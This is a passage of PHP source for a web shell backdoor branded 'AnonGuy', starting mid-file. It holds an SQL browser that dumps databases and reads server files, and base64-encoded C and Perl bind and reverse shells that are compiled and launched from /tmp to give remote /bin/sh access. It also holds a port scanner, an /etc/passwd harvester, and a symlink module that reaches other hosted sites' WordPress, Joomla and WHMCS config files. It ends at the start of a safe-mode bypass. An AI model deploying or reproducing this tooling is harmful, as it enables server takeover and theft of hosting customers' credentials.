  1293. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\
  1294. ";
  1295. }
  1296. break;
  1297. }
  1298. return false;
  1299. }
  1300. };
  1301. $db = new DbClass(@$_POST['type']);
  1302. if(@$_POST['p2']=='download') {
  1303. ob_start("ob_gzhandler", 4096);
  1304. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  1305. $db->selectdb($_POST['sql_base']);
  1306. header("Content-Disposition: attachment; filename=dump.sql");
  1307. header("Content-Type: text/plain");
  1308. foreach($_POST['tbl'] as $v)
  1309. $db->dump($v);
  1310. exit;
  1311. }
  1312. printHeader();
  1313. echo '<h1>SQL Browser</h1><div class=content>
  1314. <form name="sf" method="post">
  1315. <table cellpadding="2" cellspacing="0">
  1316. <tr>
  1317. <td>Type</td>
  1318. <td>Host</td>
  1319. <td>Login</td>
  1320. <td>Password</td>
  1321. <td>Database</td>
  1322. <td></td>
  1323. </tr>
  1324. <tr>
  1325. <input type=hidden name=a value=Sql>
  1326. <input type=hidden name=p1 value=\'query\'>
  1327. <input type=hidden name=p2>
  1328. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1329. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1330. <td>
  1331. <select name=\'type\'>
  1332. <option value="mysql" '.(@$_POST['type']=='mysql'?'selected':'').'>MySql</option>
  1333. <option value="pgsql" '.(@$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>
  1334. </select></td>
  1335. <td><input type=text name=sql_host value="'.(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])).'"></td>
  1336. <td><input type=text name=sql_login value="'.(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])).'"></td>
  1337. <td><input type=text name=sql_pass value="'.(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])).'"></td>
  1338. <td>';
  1339. $tmp = "<input type=text name=sql_base value=''>";
  1340. if(isset($_POST['sql_host'])){
  1341. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  1342. switch($_POST['charset']) {
  1343. case "Windows-1251": $db->setCharset('cp1251'); break;
  1344. case "UTF-8": $db->setCharset('utf8'); break;
  1345. case "KOI8-R": $db->setCharset('koi8r'); break;
  1346. case "KOI8-U": $db->setCharset('koi8u'); break;
  1347. case "cp866": $db->setCharset('cp866'); break;
  1348. }
  1349. $db->listDbs();
  1350. echo "<select name=sql_base><option value=''></option>";
  1351. while($item = $db->fetch()) {
  1352. list($key, $value) = each($item);
  1353. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  1354. }
  1355. echo '</select>';
  1356. }
  1357. else echo $tmp;
  1358. }else
  1359. echo $tmp;
  1360. echo '</td>
  1361. <td><input type=submit value=">>"></td>
  1362. </tr>
  1363. </table>
  1364. <script>
  1365. function st(t,l) {
  1366. document.sf.p1.value = \'select\';
  1367. document.sf.p2.value = t;
  1368. if(l!=null)document.sf.p3.value = l;
  1369. document.sf.submit();
  1370. }
  1371. function is() {
  1372. for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
  1373. document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
  1374. }
  1375. </script>';
  1376. if(isset($db) && $db->link){
  1377. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  1378. if(!empty($_POST['sql_base'])){
  1379. $db->selectdb($_POST['sql_base']);
  1380. echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
  1381. $tbls_res = $db->listTables();
  1382. while($item = $db->fetch($tbls_res)) {
  1383. list($key, $value) = each($item);
  1384. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
  1385. $value = htmlspecialchars($value);
  1386. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
  1387. }
  1388. echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
  1389. if(@$_POST['p1'] == 'select') {
  1390. $_POST['p1'] = 'query';
  1391. $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
  1392. $num = $db->fetch();
  1393. $num = $num['n'];
  1394. echo "<span>".$_POST['p2']."</span> ($num) ";
  1395. for($i=0;$i<($num/30);$i++)
  1396. if($i != (int)$_POST['p3'])
  1397. echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
  1398. else
  1399. echo ($i+1)," ";
  1400. if($_POST['type']=='pgsql')
  1401. $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  1402. else
  1403. $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  1404. echo "<br><br>";
  1405. }
  1406. if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
  1407. $db->query(@$_POST['p3']);
  1408. if($db->res !== false) {
  1409. $title = false;
  1410. echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
  1411. $line = 1;
  1412. while($item = $db->fetch()) {
  1413. if(!$title) {
  1414. echo '<tr>';
  1415. foreach($item as $key => $value)
  1416. echo '<th>'.$key.'</th>';
  1417. reset($item);
  1418. $title=true;
  1419. echo '</tr><tr>';
  1420. $line = 2;
  1421. }
  1422. echo '<tr class="l'.$line.'">';
  1423. $line = $line==1?2:1;
  1424. foreach($item as $key => $value) {
  1425. if($value == null)
  1426. echo '<td><i>null</i></td>';
  1427. else
  1428. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  1429. }
  1430. echo '</tr>';
  1431. }
  1432. echo '</table>';
  1433. } else {
  1434. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  1435. }
  1436. }
  1437. echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
  1438. echo "</td></tr>";
  1439. }
  1440. echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  1441. if(@$_POST['p1'] == 'loadfile') {
  1442. $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
  1443. $file = $db->fetch();
  1444. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  1445. }
  1446. }
  1447. echo '</div>';
  1448. printFooter();
  1449. }
  1450.  
  1451. function actionNetwork() {
  1452. printHeader();
  1453. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  1454. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1455. $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  1456. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1457.  
  1458. echo '<h1>Network-ing Tools</h1><div class=content>
  1459. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  1460. <br /><span>Bind port to /bin/sh</span><br/>
  1461. Port: <input type=\'text\' name=\'port\' value=\'443\'> Password: <input type=\'text\' name=\'pass\' value=\'AnOnGuY\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
  1462. </form>
  1463. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  1464. <br /><br /><span>Back-connect to</span><br/>
  1465. Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'443\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
  1466. </form><br>';
  1467. if(isset($_POST['p1'])) {
  1468. function cf($f,$t) {
  1469. $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1470. if($w) {
  1471. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  1472. @fclose($w);
  1473. }
  1474. }
  1475. if($_POST['p1'] == 'bpc') {
  1476. cf("/tmp/bp.c",$bind_port_c);
  1477. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  1478. @unlink("/tmp/bp.c");
  1479. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  1480. echo "<pre class=ml1>$out\
  1481. ".ex("ps aux | grep bp")."</pre>";
  1482. }
  1483. if($_POST['p1'] == 'bpp') {
  1484. cf("/tmp/bp.pl",$bind_port_p);
  1485. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  1486. echo "<pre class=ml1>$out\
  1487. ".ex("ps aux | grep bp.pl")."</pre>";
  1488. }
  1489. if($_POST['p1'] == 'bcc') {
  1490. cf("/tmp/bc.c",$back_connect_c);
  1491. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  1492. @unlink("/tmp/bc.c");
  1493. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  1494. echo "<pre class=ml1>$out\
  1495. ".ex("ps aux | grep bc")."</pre>";
  1496. }
  1497. if($_POST['p1'] == 'bcp') {
  1498. cf("/tmp/bc.pl",$back_connect_p);
  1499. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  1500. echo "<pre class=ml1>$out\
  1501. ".ex("ps aux | grep bc.pl")."</pre>";
  1502. }
  1503. }
  1504. echo '</div>';
  1505. printFooter();
  1506. }
  1507.  
  1508. function actionPortScanner() {
  1509. printHeader();
  1510. echo '<h1>Port Scanner</h1>';
  1511. echo '<div class="content">';
  1512. echo '<form action="" method="post">';
  1513.  
  1514. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1515. $start = strip_tags($_POST['start']);
  1516. $end = strip_tags($_POST['end']);
  1517. $host = strip_tags($_POST['host']);
  1518. for($i = $start; $i<=$end; $i++){
  1519. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1520. if($fp){
  1521. echo 'Port '.$i.' is <font color=lime>open</font><br>';
  1522. }
  1523. flush();
  1524. }
  1525. } else {
  1526. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  1527. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1528. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1529. Host: <input type="text" name="host" value="localhost"/><br /><br />
  1530. Port start: <input type="text" name="start" value="0"/><br /><br />
  1531. Port end:<input type="text" name="end" value="5000"/><br /><br />
  1532. <input type="submit" value="Scan Ports" />
  1533. </form></center><br /><br />';
  1534. }
  1535. echo '</div>';
  1536. printFooter();
  1537. }
  1538. function actionReadable() {
  1539. printHeader();
  1540. echo '<h1>Readable Directories</h1>';
  1541. echo '<div class="content">';
  1542. $sm = ini_get('safe_mode');
  1543. if($sm) {
  1544. echo '<br /><b>Error: safe_mode = on</b><br /><br />';
  1545. } else {
  1546. @$passwd = file('/etc/passwd','r');
  1547. if (!$passwd) {
  1548. echo '<br /><b>[#] Error : couldn`t read /etc/passwd</b><br /><br />';
  1549. } else {
  1550. $pub = array();
  1551. $users = array();
  1552. $conf = array();
  1553. $i = 0;
  1554. foreach($passwd as $p) {
  1555. $r = explode(':',$p);
  1556. $dirz = $r[5].'/public_html/';
  1557. if(strpos($r[5],'home')) {
  1558. array_push($users,$r[0]);
  1559. if (is_readable($dirz)) {
  1560. array_push($pub,$dirz);
  1561. }
  1562. }
  1563. }
  1564. echo '<br><br>';
  1565. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\
  1566. "."<br />";
  1567. echo "[+] Founded ".sizeof($pub)." readable public_html directories\
  1568. "."<br /><br /><br />";
  1569. foreach ($pub as $user) {
  1570. echo $user."<br>";
  1571. }
  1572. echo "<br /><br /><br />[+] Complete...\
  1573. "."<br />";
  1574. }
  1575. }
  1576. echo '</div>';
  1577. printFooter();
  1578. }
  1579.  
  1580. function actionSymlink() {
  1581. printHeader();
  1582. echo '<h1>Symlink</h1>';
  1583. $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  1584. $expld = explode('/',$furl );
  1585. $burl =str_replace(end($expld),'',$furl);
  1586.  
  1587. echo '<div class="content"><center>
  1588. <h3>[ <a href="#" onclick="g(\'symlink\',null,\'website\',null)">Domains</a> ] -
  1589. [ <a href="#" onclick="g(\'symlink\',null,\'whole\',null)">Whole Server Symlink<sup style="color:red;text-decoration:blink;">New</sup></a> ] -
  1590. [ <a href="#" onclick="g(\'symlink\',null,\'config\',null)">Config files symlink</a> ]</h3></center>';
  1591.  
  1592. if(isset($_POST['p1']) && $_POST['p1']=='website')
  1593. {
  1594. echo "<center>";
  1595. $d0mains = @file("/etc/named.conf");
  1596. if(!$d0mains){
  1597. echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1598. } else {
  1599. echo "<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";
  1600.  
  1601. $unk = array();
  1602. foreach($d0mains as $d0main){
  1603. if(@eregi("zone",$d0main)){
  1604. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1605. flush();
  1606. if(strlen(trim($domains[1][0])) > 2){
  1607. $unk[] = $domains[1][0];
  1608. flush();
  1609.  
  1610. }
  1611. }
  1612. }
  1613. $count=1;
  1614. $unk = array_unique($unk);
  1615. $l=0;
  1616. foreach($unk as $d){
  1617. $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
  1618. echo "<tr".($l?' class=l1':'')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user['name']."</td></tr>";
  1619. flush();
  1620. $count++;
  1621. $l=$l?0:1;
  1622. }
  1623. echo "</table>";
  1624. }
  1625. echo "</center>";
  1626. }
  1627.  
  1628. if(isset($_POST['p1']) && $_POST['p1']=='whole')
  1629. {
  1630. echo "<center>";
  1631. @mkdir('AnonGuy_sym',0777);
  1632. $hdt = "Options all\
  1633. DirectoryIndex Sux.html\
  1634. AddType text/plain .php\
  1635. AddHandler server-parsed .php\
  1636. AddType text/plain .html\
  1637. AddHandler txt .html\
  1638. Require None\
  1639. Satisfy Any";
  1640. $hfp =@fopen ('AnonGuy_sym/.htaccess','w');
  1641. fwrite($hfp ,$hdt);
  1642. if(function_exists('symlink')) {
  1643. @symlink('/','AnonGuy_sym/root');
  1644. }
  1645. $d0mains = @file('/etc/named.conf');
  1646. if(!$d0mains) {
  1647. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1648. echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
  1649. $dt = file('/etc/passwd');
  1650. $l=0;
  1651. foreach($dt as $d) {
  1652. $r = explode(':',$d);
  1653. if(strpos($r[5],'home')) {
  1654. echo "<tr".($l?' class=l1':'')."><td>".$j."</td><td>---</td><td>".$r[0]."</td><td><a href='AnonGuy_sym/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
  1655. $l=$l?0:1;
  1656. $j++;
  1657. }
  1658. }
  1659. echo '</table>';
  1660. } else {
  1661. echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
  1662. $count=1;
  1663. $mck = array();
  1664. foreach($d0mains as $d0main){
  1665. if(@eregi('zone',$d0main)){
  1666. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1667. flush();
  1668. if(strlen(trim($domain[1][0])) >2){
  1669. $mck[] = $domain[1][0];
  1670. }
  1671. }
  1672. }
  1673. $mck = array_unique($mck);
  1674. $usr = array();
  1675. $dmn = array();
  1676. foreach($mck as $o) {
  1677. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1678. $usr[] = $infos['name'];
  1679. $dmn[] = $o;
  1680. }
  1681. array_multisort($usr,$dmn);
  1682. $dt = file('/etc/passwd');
  1683. $passwd = array();
  1684. foreach($dt as $d) {
  1685. $r = explode(':',$d);
  1686. if(strpos($r[5],'home')) {
  1687. $passwd[$r[0]] = $r[5];
  1688. }
  1689. }
  1690. $l=0;
  1691. $j=1;
  1692. foreach($usr as $r) {
  1693. echo "<tr".($l?' class=l1':'')."><td>".$count++."</td>
  1694. <td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
  1695. <td>'.$r."</td>
  1696. <td><a href='AnonGuy_sym/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
  1697. flush();
  1698. $l=$l?0:1;
  1699. $j++;
  1700. }
  1701. echo '</table>';
  1702. }
  1703. echo "</center>";
  1704. }
  1705.  
  1706. if(isset($_POST['p1']) && $_POST['p1']=='config')
  1707. {
  1708. echo "<center>";
  1709. @mkdir('AnonGuy_sym',0777);
  1710. $hdt = "Options all \
  1711. DirectoryIndex Sux.html \
  1712. AddType text/plain .php \
  1713. AddHandler server-parsed .php \
  1714. AddType text/plain .html \
  1715. AddHandler txt .html \
  1716. Require None \
  1717. Satisfy Any";
  1718. $hfp = @fopen ('AnonGuy_sym/.htaccess','w');
  1719. @fwrite($hfp ,$hdt);
  1720. if(function_exists('symlink')) {
  1721. @symlink('/','AnonGuy_sym/root');
  1722. }
  1723. $d0mains = @file('/etc/named.conf');
  1724. if(!$d0mains) {
  1725. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1726. } else {
  1727. echo "<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domain </th<th> User </th>><th> Script </th></tr>";
  1728. $count = 1;
  1729. $l=0;
  1730. foreach($d0mains as $d0main){
  1731. if(@eregi('zone',$d0main)){
  1732. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1733. flush();
  1734. if(strlen(trim($domain[1][0]))>2){
  1735. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));
  1736.  
  1737. $c1 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/wp-config.php';
  1738. $ch01 = get_headers($c1);
  1739. $cf01 = $ch01[0];
  1740. $c2 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
  1741. $ch02 = get_headers($c2);
  1742. $cf02 = $ch02[0];
  1743. $c3 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/configuration.php';
  1744. $ch03 = get_headers($c3);
  1745. $cf03 = $ch03[0];
  1746. $c4 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
  1747. $ch04 = get_headers($c4);
  1748. $cf04 = $ch04[0];
  1749. $c5 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/includes/config.php';
  1750. $ch05 = get_headers($c5);
  1751. $cf05 = $ch05[0];
  1752. $c6 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
  1753. $ch06 = get_headers($c6);
  1754. $cf06 = $ch06[0];
  1755. $c7 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
  1756. $ch07 = get_headers($c7);
  1757. $cf07 = $ch07[0];
  1758. $c8 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
  1759. $ch08 = get_headers($c8);
  1760. $cf08 = $ch08[0];
  1761. $c9 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
  1762. $ch09 = get_headers($c9);
  1763. $cf09 = $ch09[0];
  1764. $c10 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
  1765. $ch10 = get_headers($c10);
  1766. $cf10 = $ch10[0];
  1767. $c11 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/submitticket.php';
  1768. $ch11 = get_headers($c11);
  1769. $cf11 = $ch11[0];
  1770. $c12 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
  1771. $ch12 = get_headers($c12);
  1772. $cf12 = $ch12[0];
  1773. $c13 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
  1774. $ch13 = get_headers($c13);
  1775. $cf13 = $ch13[0];
  1776. $c14 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
  1777. $ch14 = get_headers($c14);
  1778. $cf14 = $ch14[0];
  1779. $c15 = $burl.'/AnonGuy_sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
  1780. $ch15 = get_headers($c15);
  1781. $cf15 = $ch15[0];
  1782.  
  1783. $out = '&nbsp;';
  1784. if(strpos($cf01,'200') == true) { $out = "<a href='".$c1."' target='_blank'>Wordpress</a>"; }
  1785. elseif(strpos($cf02,'200') == true) { $out = "<a href='".$c2."' target='_blank'>Wordpress</a>"; }
  1786. elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " <a href='".$c11."' target='_blank'>WHMCS</a>"; }
  1787. elseif(strpos($cf09,'200') == true) { $out = " <a href='".$c9."' target='_blank'>WHMCS</a>"; }
  1788. elseif(strpos($cf10,'200') == true) { $out = " <a href='".$c10."' target='_blank'>WHMCS</a>"; }
  1789. elseif(strpos($cf03,'200') == true) { $out = " <a href='".$c3."' target='_blank'>Joomla</a>"; }
  1790. elseif(strpos($cf04,'200') == true) { $out = " <a href='".$c4."' target='_blank'>Joomla</a>"; }
  1791. elseif(strpos($cf05,'200') == true) { $out = " <a href='".$c5."' target='_blank'>vBulletin</a>"; }
  1792. elseif(strpos($cf06,'200') == true) { $out = " <a href='".$c6."' target='_blank'>vBulletin</a>"; }
  1793. elseif(strpos($cf07,'200') == true) { $out = " <a href='".$c7."' target='_blank'>vBulletin</a>"; }
  1794. elseif(strpos($cf08,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Client Area</a>"; }
  1795. elseif(strpos($cf12,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Client Area</a>"; }
  1796. elseif(strpos($cf13,'200') == true) { $out = " <a href='".$c7."' target='_blank'>osCommerce/Zen Cart</a>"; }
  1797. elseif(strpos($cf14,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Magento</a>"; }
  1798. elseif(strpos($cf15,'200') == true) { $out = " <a href='".$c7."' target='_blank'>Drupal</a>"; }
  1799. else {
  1800. continue;
  1801. }
  1802. echo '<tr'.($l?' class=l1':'').'><td>'.$count++.'</td><td><a href=http://www.'.$domain[1][0].'/>'.$domain[1][0].'</a></td><td>'.$user['name'].'</td><td>'.$out.'</td></tr>';
  1803. flush();
  1804. $l=$l?0:1;
  1805. }
  1806. }
  1807. }
  1808. echo "</table>";
  1809. }
  1810. echo "</center>";
  1811. }
  1812. echo "</div>";
  1813. printFooter();
  1814. }
  1815.  
  1816. function actionBypass() {
  1817. printHeader();
  1818. echo '<h1>Safe Mode</h1>';
  1819. echo '<div class="content">';
  1820. echo "<div class=header><center><h3><span>| SAFE MODE, MOD SECURITY DISABLED & PERL 500 (INTERNAL ERROR) BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
